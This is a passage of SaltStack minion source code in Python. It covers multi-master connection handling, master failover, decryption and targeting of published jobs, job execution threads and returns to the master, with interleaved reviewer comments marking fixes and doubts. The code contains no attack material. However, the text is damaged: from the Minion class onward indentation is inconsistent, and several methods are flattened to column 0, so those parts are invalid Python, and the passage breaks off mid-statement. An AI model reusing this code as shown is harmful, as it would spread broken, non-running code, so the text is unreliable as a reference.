            salt.syspaths.SOCK_DIR,
            'minion'
        )
        minion_sock_dir = self.opts.get('sock_dir', default_minion_sock_dir)

        if not os.path.isdir(minion_sock_dir):
            # Let's try to create the directory defined on the configuration
            # file
            try:
                os.makedirs(minion_sock_dir, 0o755)
            except OSError as exc:
                log.error('Could not create SOCK_DIR: {0}'.format(exc))
                # Let's not fail yet and try using the default path
                if minion_sock_dir == default_minion_sock_dir:
                    # We're already trying the default system path, stop now!
                    raise

                if not os.path.isdir(default_minion_sock_dir):
                    try:
                        os.makedirs(default_minion_sock_dir, 0o755)
                    except OSError as exc:
                        log.error('Could not create SOCK_DIR: {0}'.format(exc))
                        # Let's stop at this stage
                        raise

        # Create the pull socket
        self.epull_sock = self.context.socket(zmq.PULL)

        # Securely bind the event sockets
        # For unix sockets, tighten the umask so the socket files are
        # created without group/other access; always restore it afterwards.
        if self.opts.get('ipc_mode', '') != 'tcp':
            old_umask = os.umask(0o177)
        try:
            log.info('Starting pub socket on {0}'.format(epub_uri))
            self.epub_sock.bind(epub_uri)
            log.info('Starting pull socket on {0}'.format(epull_uri))
            self.epull_sock.bind(epull_uri)
        finally:
            if self.opts.get('ipc_mode', '') != 'tcp':
                os.umask(old_umask)

    @staticmethod
    def process_schedule(minion, loop_interval):
        '''
        Evaluate the minion's scheduler once and return the (possibly
        lowered) loop interval; scheduler errors are logged, never raised.
        '''
        try:
            minion.schedule.eval()
            # Check if scheduler requires lower loop interval than
            # the loop_interval setting
            if minion.schedule.loop_interval < loop_interval:
                loop_interval = minion.schedule.loop_interval
                log.debug(
                    'Overriding loop_interval because of scheduled jobs.'
                )
        except Exception as exc:
            log.error(
                'Exception {0} occurred in scheduled job'.format(exc)
            )
        return loop_interval
class MasterMinion(object):
    '''
    Create a fully loaded minion function object for generic use on the
    master. What makes this class different is that the pillar is
    omitted, otherwise everything else is loaded cleanly.
    '''
    def __init__(
            self,
            opts,
            returners=True,
            states=True,
            rend=True,
            matcher=True,
            whitelist=None):
        # Start from the on-disk minion config, then overlay the caller's
        # opts so explicit settings win.
        # NOTE(review): salt.config is not among the visible imports of this
        # module -- presumably pulled in transitively via `import salt.client`
        # or similar; verify.
        self.opts = salt.config.minion_config(opts['conf_file'])
        self.opts.update(opts)
        self.whitelist = whitelist
        self.opts['grains'] = salt.loader.grains(opts)
        # Pillar is deliberately left empty on the master-side minion.
        self.opts['pillar'] = {}
        # Remember which subsystems to load on (re)generation.
        self.mk_returners = returners
        self.mk_states = states
        self.mk_rend = rend
        self.mk_matcher = matcher
        self.gen_modules(initial_load=True)

    def gen_modules(self, initial_load=False):
        '''
        Load all of the modules for the minion

        Only the subsystems selected in __init__ (returners, states,
        renderers, matcher) are loaded.
        '''
        self.functions = salt.loader.minion_mods(
            self.opts,
            whitelist=self.whitelist,
            initial_load=initial_load)
        if self.mk_returners:
            self.returners = salt.loader.returners(self.opts, self.functions)
        if self.mk_states:
            self.states = salt.loader.states(self.opts, self.functions)
        if self.mk_rend:
            self.rend = salt.loader.render(self.opts, self.functions)
        if self.mk_matcher:
            self.matcher = Matcher(self.opts, self.functions)
        # Allow a live reload of all modules through the loaded function set.
        self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
    '''
    Create a multi minion interface, this creates as many minions as are
    defined in the master option and binds each minion object to a respective
    master.
    '''
    # timeout for one of the minions to auth with a master
    MINION_CONNECT_TIMEOUT = 5

    def __init__(self, opts):
        super(MultiMinion, self).__init__(opts)

    def minions(self):
        '''
        Return a dict of minion generators bound to the tune_in method
        dict of master -> minion_mapping, the mapping contains:
            opts: options used to create the minion
            last: last auth attempt time
            auth_wait: time to wait for next auth attempt
            minion: minion object
            generator: generator function (non-blocking tune_in)
        '''
        if not isinstance(self.opts['master'], list):
            log.error(
                'Attempting to start a multimaster system with one master')
            sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        ret = {}
        for master in set(self.opts['master']):
            s_opts = copy.copy(self.opts)
            s_opts['master'] = master
            s_opts['multimaster'] = True
            ret[master] = {'opts': s_opts,
                           'last': time.time(),
                           'auth_wait': s_opts['acceptance_wait_time']}
            try:
                minion = Minion(s_opts, self.MINION_CONNECT_TIMEOUT, False)
                ret[master]['minion'] = minion
                ret[master]['generator'] = minion.tune_in_no_block()
            except SaltClientError as exc:
                # Leave 'minion'/'generator' unset for this master;
                # tune_in() keeps retrying the connection with backoff.
                log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(master))
        return ret

    # Multi Master Tune In
    def tune_in(self):
        '''
        Bind to the masters

        This loop will attempt to create connections to masters it hasn't connected
        to yet, but once the initial connection is made it is up to ZMQ to do the
        reconnect (don't know of an API to get the state here in salt)
        '''
        self._prepare_minion_event_system()
        self.poller.register(self.epull_sock, zmq.POLLIN)

        # Prepare the minion generators
        minions = self.minions()
        loop_interval = int(self.opts['loop_interval'])
        auth_wait = self.opts['acceptance_wait_time']
        max_wait = self.opts['acceptance_wait_time_max']

        while True:
            package = None

            # Run scheduled jobs of every minion that is already up.
            for minion in minions.values():
                if isinstance(minion, dict):
                    minion = minion['minion']
                if not hasattr(minion, 'schedule'):
                    continue
                loop_interval = self.process_schedule(minion, loop_interval)

            # Pull at most one event off the local event bus per pass.
            socks = dict(self.poller.poll(1))
            if socks.get(self.epull_sock) == zmq.POLLIN:
                try:
                    package = self.epull_sock.recv(zmq.NOBLOCK)
                except Exception:
                    pass

            masters = list(minions.keys())
            shuffle(masters)
            # Do stuff per minion that we have
            for master in masters:
                minion = minions[master]
                # if we haven't connected yet, lets attempt some more.
                # make sure to keep separate auth_wait times, since these
                # are separate masters
                if 'generator' not in minion:
                    if time.time() - minion['auth_wait'] > minion['last']:
                        minion['last'] = time.time()
                        if minion['auth_wait'] < max_wait:
                            minion['auth_wait'] += auth_wait
                        try:
                            t_minion = Minion(minion['opts'], self.MINION_CONNECT_TIMEOUT, False)
                            minions[master]['minion'] = t_minion
                            minions[master]['generator'] = t_minion.tune_in_no_block()
                            minions[master]['auth_wait'] = self.opts['acceptance_wait_time']
                        except SaltClientError:
                            log.error('Error while bringing up minion for multi-master. Is master {0} responding?'.format(master))
                            continue
                    else:
                        continue

                # run scheduled jobs if you have them
                loop_interval = self.process_schedule(minion['minion'], loop_interval)

                # if you have an event to handle, do it on a single minion
                # (first one to not throw an exception)
                if package:
                    # If we need to expand this, we may want to consider a specific header
                    # or another approach entirely.
                    if package.startswith('_minion_mine'):
                        # Mine updates are broadcast to every master's minion.
                        # BUG FIX: the original indexed minions[master] here,
                        # delivering the event to the same minion once per
                        # entry instead of to each minion in turn.
                        for multi_minion in minions:
                            try:
                                minions[multi_minion]['minion'].handle_event(package)
                            except Exception:
                                pass
                    else:
                        try:
                            minion['minion'].handle_event(package)
                            # BUG FIX: the original set package = None *before*
                            # sending, so send(None) always raised (swallowed
                            # below) and the event was never re-published on
                            # the local event bus.
                            self.epub_sock.send(package)
                            package = None
                        except Exception:
                            pass

                # have the Minion class run anything it has to run
                next(minion['generator'])
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True):  # pylint: disable=W0231
    '''
    Pass in the options dict

    Resolves/authenticates the master (eval_master), loads modules,
    compiles pillar, sets up the scheduler and, when pillar defines
    proxies, forks one child process per proxy minion.
    '''
    self._running = None

    # Warn if ZMQ < 3.2
    if HAS_ZMQ:
        try:
            zmq_version_info = zmq.zmq_version_info()
        except AttributeError:
            # PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
            # using zmq.zmq_version() and build a version info tuple.
            zmq_version_info = tuple(
                [int(x) for x in zmq.zmq_version().split('.')]
            )
        if zmq_version_info < (3, 2):
            log.warning(
                'You have a version of ZMQ less than ZMQ 3.2! There are '
                'known connection keep-alive issues with ZMQ < 3.2 which '
                'may result in loss of contact with minions. Please '
                'upgrade your ZMQ!'
            )
    # Late setup the of the opts grains, so we can log from the grains
    # module
    opts['grains'] = salt.loader.grains(opts)

    # evaluate the master to connect to and authenticate with it
    # NOTE: eval_master() calls MinionBase.__init__ (hence the W0231
    # suppression above) and sets self.opts as a side effect.
    opts['master'] = self.eval_master(opts,
                                      timeout,
                                      safe)

    self.functions, self.returners, self.function_errors = self._load_modules()
    self.opts['pillar'] = salt.pillar.get_pillar(
        opts,
        opts['grains'],
        opts['id'],
        opts['environment'],
        funcs=self.functions
    ).compile_pillar()
    self.serial = salt.payload.Serial(self.opts)
    self.mod_opts = self._prep_mod_opts()
    self.matcher = Matcher(self.opts, self.functions)
    self.proc_dir = get_proc_dir(opts['cachedir'])
    self.schedule = salt.utils.schedule.Schedule(
        self.opts,
        self.functions,
        self.returners)

    # add default scheduling jobs to the minions scheduler
    if 'mine.update' in self.functions:
        log.info('Added mine.update to scheduler')
        self.schedule.add_job({
            '__mine_interval':
            {
                'function': 'mine.update',
                'minutes': opts['mine_interval'],
                'jid_include': True,
                'maxrunning': 2
            }
        })

    # add master_alive job if enabled
    if self.opts['master_alive_interval'] > 0:
        self.schedule.add_job({
            '__master_alive':
            {
                'function': 'status.master',
                'seconds': opts['master_alive_interval'],
                'jid_include': True,
                'maxrunning': 1,
                'kwargs': {'master_ip': self.opts['master'],
                           'connected': True}
            }
        })

    self.grains_cache = self.opts['grains']

    # store your hexid to subscribe to zmq, hash since zmq filters are prefix
    # matches this way we can avoid collisions
    # NOTE(review): sha1() of a str only works on Python 2; on Python 3
    # the id would need encoding to bytes first -- confirm target runtime.
    self.hexid = hashlib.sha1(self.opts['id']).hexdigest()

    if 'proxy' in self.opts['pillar']:
        log.debug('I am {0} and I need to start some proxies for {1}'.format(self.opts['id'],
                                                                             self.opts['pillar']['proxy']))
        for p in self.opts['pillar']['proxy']:
            log.debug('Starting {0} proxy.'.format(p))
            # Fork one child per proxy: the parent continues the loop, the
            # child runs the proxy minion and exits via clean_die.
            pid = os.fork()
            if pid > 0:
                continue
            else:
                # NOTE(review): salt.ProxyMinion may not exist as a
                # top-level attribute of the salt package -- verify.
                proxyminion = salt.ProxyMinion()
                proxyminion.start(self.opts['pillar']['proxy'][p])
                self.clean_die(signal.SIGTERM, None)
    else:
        log.debug('I am {0} and I am not supposed to start any proxies. '
                  '(Likely not a problem)'.format(self.opts['id']))

    # __init__() from MinionBase is called in Minion.eval_master()
def eval_master(self,
                opts,
                timeout=60,
                safe=True,
                failed=False):
    '''
    Evaluates and returns the current master address. In standard mode, just calls
    authenticate() with the given master address.

    With master_type=func evaluates the current master address from the given
    module and then calls authenticate().

    With master_type=failover takes the list of masters and loops through them.
    The first one that allows the minion to connect is used to authenticate() and
    then returned. If this function is called outside the minions initialization
    phase (for example from the minions main event-loop when a master connection
    loss was detected), 'failed' should be set to True. The current
    (possibly failed) master will then be removed from the list of masters.
    '''
    # check if master_type was altered from its default
    if opts['master_type'] != 'str':
        # check for a valid keyword
        if opts['master_type'] == 'func':
            # split module and function and try loading the module
            mod, fun = opts['master'].split('.')
            try:
                master_mod = salt.loader.raw_mod(opts, mod, fun)
                if not master_mod:
                    raise TypeError
                # we take whatever the module returns as master address
                opts['master'] = master_mod[mod + '.' + fun]()
            except TypeError:
                msg = ('Failed to evaluate master address from '
                       'module \'{0}\''.format(opts['master']))
                log.error(msg)
                sys.exit(salt.defaults.exitcodes.EX_GENERIC)
            log.info('Evaluated master from module: {0}'.format(master_mod))

        # if failover is set, master has to be of type list
        elif opts['master_type'] == 'failover':
            if isinstance(opts['master'], list):
                log.info('Got list of available master addresses:'
                         ' {0}'.format(opts['master']))
                if opts['master_shuffle']:
                    shuffle(opts['master'])
            elif opts['__role'] == 'syndic':
                log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))

            # if failed=True, the minion was previously connected
            # we're probably called from the minions main-event-loop
            # because a master connection loss was detected. remove
            # the possibly failed master from the list of masters.
            elif failed:
                log.info('Removing possibly failed master {0} from list of'
                         ' masters'.format(opts['master']))
                # create new list of master with the possibly failed one removed
                opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]

            else:
                msg = ('master_type set to \'failover\' but \'master\' '
                       'is not of type list but of type '
                       '{0}'.format(type(opts['master'])))
                log.error(msg)
                sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        else:
            msg = ('Invalid keyword \'{0}\' for variable '
                   '\'master_type\''.format(opts['master_type']))
            log.error(msg)
            sys.exit(salt.defaults.exitcodes.EX_GENERIC)

    # if we have a list of masters, loop through them and be
    # happy with the first one that allows us to connect
    if isinstance(opts['master'], list):
        conn = False
        # shuffle the masters and then loop through them
        local_masters = copy.copy(opts['master'])

        for master in local_masters:
            opts['master'] = master
            opts.update(resolve_dns(opts))
            # MinionBase.__init__ sets self.opts for this candidate master.
            super(Minion, self).__init__(opts)

            # on first run, update self.opts with the whole master list
            # to enable a minion to re-use old masters if they get fixed
            if 'master_list' not in self.opts:
                self.opts['master_list'] = local_masters

            try:
                # authenticate() returning 'full' means the master refused
                # us because it is at capacity; anything else is success.
                if self.authenticate(timeout, safe) != 'full':
                    conn = True
                    break
            except SaltClientError:
                msg = ('Master {0} could not be reached, trying '
                       'next master (if any)'.format(opts['master']))
                log.info(msg)
                continue

        if not conn:
            self.connected = False
            msg = ('No master could be reached or all masters denied '
                   'the minions connection attempt.')
            log.error(msg)
            # NOTE(review): this path falls off the end and implicitly
            # returns None, so opts['master'] in __init__ becomes None --
            # confirm callers tolerate that.
        else:
            self.connected = True
            return opts['master']

    # single master sign in
    else:
        opts.update(resolve_dns(opts))
        super(Minion, self).__init__(opts)
        if self.authenticate(timeout, safe) == 'full':
            self.connected = False
            msg = ('master {0} rejected the minions connection because too '
                   'many minions are already connected.'.format(opts['master']))
            log.error(msg)
            sys.exit(salt.defaults.exitcodes.EX_GENERIC)
        else:
            self.connected = True
            return opts['master']
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in self.opts.items():
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _load_modules(self, force_refresh=False):
    '''
    Return the functions and the returners loaded up from the loader
    module

    :param bool force_refresh: force a refresh of the grains before loading
    :return: (functions, returners, errors) tuple
    '''
    # if this is a *nix system AND modules_max_memory is set, lets enforce
    # a memory limit on module imports
    # this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
    modules_max_memory = False
    if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
        log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
        modules_max_memory = True
        old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
        # Current usage plus the configured headroom becomes the cap.
        # NOTE(review): get_memory_info() is the pre-2.0 psutil API
        # (replaced by memory_info()) -- confirm the supported psutil range.
        rss, vms = psutil.Process(os.getpid()).get_memory_info()
        mem_limit = rss + vms + self.opts['modules_max_memory']
        resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
    elif self.opts.get('modules_max_memory', -1) > 0:
        # The option is set but cannot be honored; say why.
        if not HAS_PSUTIL:
            log.error('Unable to enforce modules_max_memory because psutil is missing')
        if not HAS_RESOURCE:
            log.error('Unable to enforce modules_max_memory because resource is missing')

    self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
    if self.opts.get('multimaster', False):
        # Give the loader its own shallow copy so per-master minions do
        # not share mutated opts.
        s_opts = copy.copy(self.opts)
        functions = salt.loader.minion_mods(s_opts)
    else:
        functions = salt.loader.minion_mods(self.opts)
    returners = salt.loader.returners(self.opts, functions)
    errors = {}
    if '_errors' in functions:
        errors = functions['_errors']
        functions.pop('_errors')

    # we're done, reset the limits!
    if modules_max_memory is True:
        resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)

    return functions, returners, errors
def _fire_master(self, data=None, tag=None, events=None, pretag=None):
    '''
    Fire an event on the master, or drop message if unable to send.
    '''
    load = {'id': self.opts['id'],
            'cmd': '_minion_event',
            'pretag': pretag,
            'tok': self.tok}
    if events:
        load['events'] = events
    elif tag:
        # A tag without data still fires, carrying an empty payload.
        load['data'] = data if data else {}
        load['tag'] = tag
    else:
        # Neither an event list nor a tag: nothing to fire.
        return
    channel = salt.transport.Channel.factory(self.opts)
    try:
        channel.send(load)
    except Exception:
        # Best effort: log the failure and drop the event.
        log.info("fire_master failed: {0}".format(traceback.format_exc()))
def _handle_payload(self, payload):
'''
Takes a payload from the master publisher and does whatever the
master wants done.
'''
{'aes': self._handle_aes,
'pub': self._handle_pub,
'clear': self._handle_clear}[payload['enc']](payload['load'],
payload['sig'] if 'sig' in payload else None)
def _handle_aes(self, load, sig=None):
    '''
    Takes the AES encrypted load, checks the signature if pub signatures
    are turned on, decrypts it, and runs the encapsulated instructions

    :param load: the AES-encrypted publication payload
    :param sig: optional publication signature; only checked when the
        'sign_pub_messages' config option is enabled
    :raises AuthenticationError: when the signature fails to validate
    '''
    # Verify that the signature is valid
    master_pubkey_path = os.path.join(self.opts['pki_dir'], 'minion_master.pub')
    if sig and self.functions['config.get']('sign_pub_messages'):
        if not salt.crypt.verify_signature(master_pubkey_path, load, sig):
            raise AuthenticationError('Message signature failed to validate.')
    try:
        data = self.crypticle.loads(load)
    except AuthenticationError:
        # decryption of the payload failed, try to re-auth but wait
        # random seconds if set in config with random_reauth_delay
        if 'random_reauth_delay' in self.opts:
            reauth_delay = randint(0, float(self.opts['random_reauth_delay']))
            # This mitigates the issue wherein a long-running job might not return
            # on a master key rotation. However, new commands issued during the re-auth
            # splay period will still fail to return.
            if not salt.utils.minion.running(self.opts):
                log.debug('Waiting {0} seconds to re-authenticate'.format(reauth_delay))
                time.sleep(reauth_delay)
            else:
                log.warning('Ignoring re-auth delay because jobs are running')
        # Re-authenticate to pick up the rotated AES key, then decrypt again
        self.authenticate()
        data = self.crypticle.loads(load)
    # Verify that the publication is valid
    if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
            or 'arg' not in data:
        return
    # Verify that the publication applies to this minion
    # It's important to note that the master does some pre-processing
    # to determine which minions to send a request to. So for example,
    # a "salt -G 'grain_key:grain_val' test.ping" will invoke some
    # pre-processing on the master and this minion should not see the
    # publication if the master does not determine that it should.
    if 'tgt_type' in data:
        # Resolve the matcher method by name; unknown target types are
        # silently ignored (no match, no execution)
        match_func = getattr(self.matcher,
                             '{0}_match'.format(data['tgt_type']), None)
        if match_func is None:
            return
        if data['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
            # These matchers take a key/value delimiter argument
            delimiter = data.get('delimiter', DEFAULT_TARGET_DELIM)
            if not match_func(data['tgt'], delimiter=delimiter):
                return
        elif not match_func(data['tgt']):
            return
    else:
        # No explicit target type: default to glob matching
        if not self.matcher.glob_match(data['tgt']):
            return
    # If the minion does not have the function, don't execute,
    # this prevents minions that could not load a minion module
    # from returning a predictable exception
    #if data['fun'] not in self.functions:
    #    return
    if 'user' in data:
        log.info(
            'User {0[user]} Executing command {0[fun]} with jid '
            '{0[jid]}'.format(data)
        )
    else:
        log.info(
            'Executing command {0[fun]} with jid {0[jid]}'.format(data)
        )
    log.debug('Command details {0}'.format(data))
    self._handle_decoded_payload(data)
def _handle_pub(self, load):
'''
Handle public key payloads
'''
pass
def _handle_clear(self, load):
'''
Handle un-encrypted transmissions
'''
pass
def _handle_decoded_payload(self, data):
    '''
    Override this method if you wish to handle the decoded data
    differently.

    Spawns a worker (process or thread, per the 'multiprocessing'
    option) that executes the published job via _thread_return or
    _thread_multi_return.

    :param data: the decoded publication; 'fun' is a string for a single
        job or a tuple/list for a compound job
    '''
    if isinstance(data['fun'], string_types):
        # Reload modules in-process before dispatching the job so the
        # reload takes effect for the scheduler as well
        if data['fun'] == 'sys.reload_modules':
            self.functions, self.returners, self.function_errors = self._load_modules()
            self.schedule.functions = self.functions
            self.schedule.returners = self.returners
    # Compound jobs (list/tuple of functions) use the multi-return target
    if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
        target = Minion._thread_multi_return
    else:
        target = Minion._thread_return
    # We stash an instance references to allow for the socket
    # communication in Windows. You can't pickle functions, and thus
    # python needs to be able to reconstruct the reference on the other
    # side.
    instance = self
    # If we are running in multi-master mode, re-inject opts into module funcs
    if instance.opts.get('multimaster', False):
        for func in instance.functions:
            sys.modules[instance.functions[func].__module__].__opts__ = self.opts
    if self.opts['multiprocessing']:
        if sys.platform.startswith('win'):
            # let python reconstruct the minion on the other side if we're
            # running on windows
            instance = None
        process = multiprocessing.Process(
            target=target, args=(instance, self.opts, data)
        )
    else:
        process = threading.Thread(
            target=target, args=(instance, self.opts, data),
            name=data['jid']
        )
    process.start()
    # NOTE(review): on non-Windows platforms the caller blocks until the
    # job worker finishes; presumably daemonize_if in the worker detaches
    # the actual job -- TODO confirm
    if not sys.platform.startswith('win'):
        process.join()
@classmethod
def _thread_return(cls, minion_instance, opts, data):
    '''
    This method should be used as a threading target, start the actual
    minion side execution.

    :param minion_instance: the Minion object, or None (Windows), in
        which case a fresh instance is constructed from ``opts``
    :param opts: the minion configuration dict
    :param data: the decoded publication (fun/arg/jid/ret/...)
    '''
    # this seems awkward at first, but it's a workaround for Windows
    # multiprocessing communication.
    if not minion_instance:
        minion_instance = cls(opts)
    # Marker file in proc_dir records this running job
    fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
    if opts['multiprocessing']:
        salt.utils.daemonize_if(opts)
    salt.utils.appendproctitle(data['jid'])
    sdata = {'pid': os.getpid()}
    sdata.update(data)
    log.info('Starting a new job with PID {0}'.format(sdata['pid']))
    with salt.utils.fopen(fn_, 'w+b') as fp_:
        fp_.write(minion_instance.serial.dumps(sdata))
    ret = {'success': False}
    function_name = data['fun']
    if function_name in minion_instance.functions:
        try:
            func = minion_instance.functions[data['fun']]
            args, kwargs = load_args_and_kwargs(
                func,
                data['arg'],
                data)
            # Reset the module context retcode before execution so a
            # previous job's retcode cannot leak into this return
            sys.modules[func.__module__].__context__['retcode'] = 0
            return_data = func(*args, **kwargs)
            if isinstance(return_data, types.GeneratorType):
                # Generator returns are streamed: each yielded item is
                # fired to the master as a progress event and folded
                # into the aggregate return (dict merge when possible,
                # otherwise a list)
                ind = 0
                iret = {}
                for single in return_data:
                    if isinstance(single, dict) and isinstance(iret, dict):
                        iret.update(single)
                    else:
                        if not iret:
                            iret = []
                        iret.append(single)
                    tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
                    event_data = {'return': single}
                    minion_instance._fire_master(event_data, tag)
                    ind += 1
                ret['return'] = iret
            else:
                ret['return'] = return_data
            # Pick up any retcode the module set during execution
            ret['retcode'] = sys.modules[func.__module__].__context__.get(
                'retcode',
                0
            )
            ret['success'] = True
        except CommandNotFoundError as exc:
            msg = 'Command required for {0!r} not found'.format(
                function_name
            )
            log.debug(msg, exc_info=True)
            ret['return'] = '{0}: {1}'.format(msg, exc)
            ret['out'] = 'nested'
        except CommandExecutionError as exc:
            log.error(
                'A command in {0!r} had a problem: {1}'.format(
                    function_name,
                    exc
                ),
                exc_info_on_loglevel=logging.DEBUG
            )
            ret['return'] = 'ERROR: {0}'.format(exc)
            ret['out'] = 'nested'
        except SaltInvocationError as exc:
            log.error(
                'Problem executing {0!r}: {1}'.format(
                    function_name,
                    exc
                ),
                exc_info_on_loglevel=logging.DEBUG
            )
            ret['return'] = 'ERROR executing {0!r}: {1}'.format(
                function_name, exc
            )
            ret['out'] = 'nested'
        except TypeError as exc:
            # Usually bad arguments from the CLI; point the user at the log
            msg = ('TypeError encountered executing {0}: {1}. See '
                   'debug log for more info.').format(function_name, exc)
            log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
            ret['return'] = msg
            ret['out'] = 'nested'
        except Exception:
            # Catch-all so the job always produces a return
            msg = 'The minion function caused an exception'
            log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
            ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
            ret['out'] = 'nested'
    else:
        # Function not loaded: report why, if the module recorded an error
        ret['return'] = '{0!r} is not available.'.format(function_name)
        mod_name = function_name.split('.')[0]
        if mod_name in minion_instance.function_errors:
            ret['return'] += ' Possible reasons: {0!r}'.format(minion_instance.function_errors[mod_name])
        ret['success'] = False
        ret['retcode'] = 254
        ret['out'] = 'nested'
    ret['jid'] = data['jid']
    ret['fun'] = data['fun']
    ret['fun_args'] = data['arg']
    if 'master_id' in data:
        ret['master_id'] = data['master_id']
    if 'metadata' in data:
        if isinstance(data['metadata'], dict):
            ret['metadata'] = data['metadata']
        else:
            log.warning('The metadata parameter must be a dictionary. Ignoring.')
    # Deliver the return to the master first, then to any extra returners
    minion_instance._return_pub(ret)
    if data['ret']:
        if 'ret_config' in data:
            ret['ret_config'] = data['ret_config']
        ret['id'] = opts['id']
        for returner in set(data['ret'].split(',')):
            try:
                minion_instance.returners['{0}.returner'.format(
                    returner
                )](ret)
            except Exception as exc:
                # A broken returner must not break the other returners
                log.error(
                    'The return failed for job {0} {1}'.format(
                        data['jid'],
                        exc
                    )
                )
                log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
    '''
    This method should be used as a threading target, start the actual
    minion side execution of a compound (multi-function) job.

    :param minion_instance: the Minion object, or None (Windows), in
        which case a fresh instance is constructed from ``opts``
    :param opts: the minion configuration dict
    :param data: decoded publication; 'fun' and 'arg' are parallel lists
    '''
    salt.utils.appendproctitle(data['jid'])
    # this seems awkward at first, but it's a workaround for Windows
    # multiprocessing communication.
    if not minion_instance:
        minion_instance = cls(opts)
    ret = {
        'return': {},
        'success': {},
    }
    # Execute each function in order; one failure does not stop the rest
    for ind in range(0, len(data['fun'])):
        ret['success'][data['fun'][ind]] = False
        try:
            func = minion_instance.functions[data['fun'][ind]]
            args, kwargs = load_args_and_kwargs(
                func,
                data['arg'][ind],
                data)
            ret['return'][data['fun'][ind]] = func(*args, **kwargs)
            ret['success'][data['fun'][ind]] = True
        except Exception as exc:
            trb = traceback.format_exc()
            log.warning(
                'The minion function caused an exception: {0}'.format(
                    exc
                )
            )
            # Ship the traceback back as this function's return value
            ret['return'][data['fun'][ind]] = trb
    ret['jid'] = data['jid']
    ret['fun'] = data['fun']
    ret['fun_args'] = data['arg']
    if 'metadata' in data:
        ret['metadata'] = data['metadata']
    minion_instance._return_pub(ret)
    if data['ret']:
        if 'ret_config' in data:
            ret['ret_config'] = data['ret_config']
        # FIX: the minion id is loop-invariant -- set it once before the
        # returner loop instead of on every iteration (this also matches
        # _thread_return's behavior)
        ret['id'] = opts['id']
        for returner in set(data['ret'].split(',')):
            try:
                minion_instance.returners['{0}.returner'.format(
                    returner
                )](ret)
            except Exception as exc:
                # A broken returner must not break the other returners
                log.error(
                    'The return failed for job {0} {1}'.format(
                        data['jid'],
                        exc
                    )
                )
def _return_pub(self, ret, ret_cmd='_return'):
    '''
    Return the data from the executed command to the master server

    :param ret: the return data dict (jid/fun/return/...)
    :param ret_cmd: master-side command used to deliver the return
        ('_return' for normal jobs, '_syndic_return' for syndics)
    :return: the master's reply, or '' when the send times out
    '''
    jid = ret.get('jid', ret.get('__jid__'))
    fun = ret.get('fun', ret.get('__fun__'))
    if self.opts['multiprocessing']:
        # Clean up the running-job marker written by _thread_return
        fn_ = os.path.join(self.proc_dir, jid)
        if os.path.isfile(fn_):
            try:
                os.remove(fn_)
            except (OSError, IOError):
                # The file is gone already
                pass
    log.info('Returning information for job: {0}'.format(jid))
    channel = salt.transport.Channel.factory(self.opts)
    if ret_cmd == '_syndic_return':
        load = {'cmd': ret_cmd,
                'id': self.opts['id'],
                'jid': jid,
                'fun': fun,
                'load': ret.get('__load__')}
        load['return'] = {}
        # Strip the syndic-internal '__' keys from the forwarded return
        for key, value in ret.items():
            if key.startswith('__'):
                continue
            load['return'][key] = value
    else:
        load = {'cmd': ret_cmd,
                'id': self.opts['id']}
        for key, value in list(ret.items()):
            load[key] = value
    # Resolve the outputter: prefer an explicit 'out' in the return,
    # else fall back to the executed function's __outputter__ attribute
    if 'out' in ret:
        if isinstance(ret['out'], string_types):
            load['out'] = ret['out']
        else:
            log.error('Invalid outputter {0}. This is likely a bug.'
                      .format(ret['out']))
    else:
        try:
            oput = self.functions[fun].__outputter__
        except (KeyError, AttributeError, TypeError):
            pass
        else:
            if isinstance(oput, string_types):
                load['out'] = oput
    if self.opts['cache_jobs']:
        # Local job cache has been enabled
        fn_ = os.path.join(
            self.opts['cachedir'],
            'minion_jobs',
            load['jid'],
            'return.p')
        jdir = os.path.dirname(fn_)
        if not os.path.isdir(jdir):
            os.makedirs(jdir)
        # BUGFIX: use a context manager so the cache file handle is
        # closed instead of leaked (matches _thread_return's usage)
        with salt.utils.fopen(fn_, 'w+b') as fp_:
            fp_.write(self.serial.dumps(ret))
    try:
        ret_val = channel.send(load)
    except SaltReqTimeoutError:
        msg = ('The minion failed to return the job information for job '
               '{0}. This is often due to the master being shut down or '
               'overloaded. If the master is running consider increasing '
               'the worker_threads value.').format(jid)
        log.warn(msg)
        return ''
    log.trace('ret_val = {0}'.format(ret_val))
    return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
